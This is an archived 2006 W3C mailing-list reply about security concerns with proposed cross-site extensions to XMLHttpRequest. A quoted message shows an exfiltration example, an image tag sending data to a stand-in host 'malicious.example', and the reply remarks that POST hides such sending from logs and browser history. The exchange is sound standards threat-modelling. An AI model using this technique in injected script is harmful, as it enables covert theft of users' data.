Re: (XMLHttpRequest 2) Second proposal for cross-site extensions to XMLHttpRequest

From: Ian Davis <ian.davis@talis.com> Date: Tue, 18 Apr 2006 13:09:44 +0100 Message-ID: <4444D708.4070207@talis.com> To: Bjoern Hoehrmann <derhoermi@gmx.net> CC: public-webapi@w3.org · This archive was generated by hypermail 2.2.0+W3C-0.50 : Tuesday, 8 January 2008 14:18:54 GMT

On 18/04/2006 13:01, Bjoern Hoehrmann wrote:
> If you are able to inject some script you can send any and all data you
> are able to obtain to a third party, in a simple case you could just
> append the data to a new <img src="http://malicious.example/?data=...">.
> So I don't think I understand your concern, could you elaborate?

You're right of course, but it's much easier to hide the data being sent 
from logs and browser history if you use POST.

Ian